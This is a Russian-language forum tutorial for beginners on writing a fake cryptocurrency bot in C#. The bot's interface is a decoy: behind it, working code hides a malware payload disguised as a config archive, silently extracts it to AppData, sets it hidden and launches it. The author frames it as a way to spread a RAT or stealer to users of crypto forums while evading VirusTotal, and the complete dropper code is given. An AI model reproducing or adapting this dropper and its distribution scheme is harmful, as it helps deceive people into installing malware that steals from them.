Fake- программа , тайно распаковывающая ваш Malware

Тема рассчитана на новичков и разложена по полкам донельзя.

Итак, цель сего действа: создать тематическую программу, которая будет тайно открывать ваш вирус, под видом файла config. Это поможет получить инсталлы в вашу панель, не сливая билд на VT, даже если очень захочется.

Начнем, для работы нам понадобится Visual Studio 2019 C#

Скачать

https://visualstudio.microsoft.com/ru/vs/

архиватор 7zip

Скачать

https://7-zip.org.ua/ru/download/

Так же понадобятся темы для форм C#, скачать можно тут

ссылка

https://disk.yandex.com/d/R3XhT-yKmyh90w

пароль: lolz

Мы будем писать с вами фейковые софта различного рода для распространения вашей малвари.
Прошу заранее вас определиться с тематикой вашего софта, в статье я выбрал тематику крипты.
Софт распространять мы будем там где могут попасться мамонты в этой сфере, а это различные форумы по криптовалюте так как тут проще всего.

Итак, начнем:

1. Запускаем Visual Studio и создаем проект Windows Forms

жмем далее и выбираем .Net 4.5 имя проекта, в примере показан бот, который якобы собирает крипту с crex24 в автоматическом режиме, но это лишь дело вашей фантазии

2. Сразу решаем вопрос с дизайном, темы для оформления по ссылке выше.

После жмем в верху Сборка > пересобрать решение.

После данных манипуляций открываем "панель элементов" и перетягиваем main theme на форму. В данном случае она называется clsNeoBuxTheme.

Так же в панели разверните вкладку "Все формы Windows Forms" и так же добавляем:

• Label – 4шт
• TextBox - 4шт
• Кнопки - в данном случае Green и Blue button
• CheckBox - 2шт

Label - тут будут названия окон ( ****, Accounts, Proxy и тд )
TextBox - это три больших окна и одно маленькое
Кнопки- тут все понятно
CheckBox- Тут можно будет ставить галочки, так же фейк интерфейс.

3. Красиво размещенные окна переименовываем, как на скрине


4. По итогу получаем интерфейс программы подобного типа:


5. Готовим билд вашего РАТ/*******а

Мы не будем качать ваш exe билд со сторонних серверов, и не будем таскать его вместе с фейковым софтом в одном exe. Мы так же не будем держать ваш exe рядом с программой в открытом виде.
Для примера вместо малваря я буду использовать putty.exe

Переименуем putty.exe в update.exe
Далее я буду использовать архиватор 7zip
Щелкаем по exe update.exe правой кнопкой и выбираем добавить к архиву.
Уровень сжатия Ультра, формат архива zip
Пароль: 123 ( Лучше ставить именно этот пароль, ибо инкодинг с Base64 будет под него )



Архив update.zip переименуем в config.y, остальное- мусор, удаляем.


6. Готовим ПО.

Теперь нам надо сделать так что бы наш софт сумел скрыто распаковать этот архив и запустить exe от туда при условии нажатия кнопки старт
Подключим необходимые NuGet пакеты:

Жмем по вкладке Проект > управление пакетами
Вкладка обзор, в поле поиска вводим SharpZipLib нужен для распаковки архива устанавливаем
После в поле поиска вводим Costura.Fody запихнет вашу dll SharpZipLib в сам билд формы что бы не таскать его отдельно, и так же установить.

7. Процесс написания кода.

Жмем 2 раза на форму в пустом месте, видим код, в котором ничего не понимаем.
Там, где написано много строк начинающихся с using, выделяем все и вписываем:

Код

using System;
using System.Text;
using System.Windows.Forms;
using ICSharpCode.SharpZipLib.Core;
using ICSharpCode.SharpZipLib.Zip;
using System.Diagnostics;
using System.IO;
using System.Threading;

Открываем соседнюю вкладку, где мы создавали визуальную форму и два раза кликаем на зеленую кнопку, чтобы вписать код под нее, и в открывшимся окне с кодом вставляем следующее:

код

string dir = Environment.GetEnvironmentVariable("AppData") + "\\Update";
if (!Directory.Exists(dir))
File.SetAttributes("config.y", FileAttributes.Hidden | FileAttributes.System)

string password = Encoding.ASCII.GetString(Convert.FromBase64String("MTIz"));
ExtractZipFile("config.y", password, dir + "\\");

File.Delete("config.y");

new Thread(() =>
{
try
{
File.SetAttributes(dir + "\\update.exe", FileAttributes.Hidden | FileAttributes.System);
Process proc = Process.Start(dir + "\\update.exe");

}
catch (Exception)
{
}

}).Start();
}

private static void ExtractZipFile(string archiveFilenameIn, string password, string outFolder)
{

{
ZipFile zf = null;
try
{
FileStream fs = File.OpenRead(archiveFilenameIn);
zf = new ZipFile(fs);
if (!String.IsNullOrEmpty(password))
{
zf.Password = password;
}
foreach (ZipEntry zipEntry in zf)
{
if (!zipEntry.IsFile)
{
continue;
}
String entryFileName = zipEntry.Name;


byte[] buffer = new byte[4096];
Stream zipStream = zf.GetInputStream(zipEntry);
String fullZipToPath = Path.Combine(outFolder, entryFileName);
string directoryName = Path.GetDirectoryName(fullZipToPath);
if (directoryName.Length > 0)
Directory.CreateDirectory(directoryName);


using (FileStream streamWriter = File.Create(fullZipToPath))
{
StreamUtils.Copy(zipStream, streamWriter, buffer);
}
}
}
catch (Exception ex)
{
throw ex;
}
finally
{
if (zf != null)
{
zf.IsStreamOwner = true;
zf.Close();
}
}


}

}

7. Завершаем
Добавляем красивую иконку для софта, правой кнопкой по проекту > свойства > Значек и манифест
На раб. столе, создаем папку CranBot Crex24 и кладем в нее наш exe фейка + рядом config.y архив соответственно.

Программе не страшен слив на VT. Остальное дело рук и фантазии.

PS. Тема мной была лишь немного переработана и дополнена. Если какие то тех вопросы, могу ответить в теме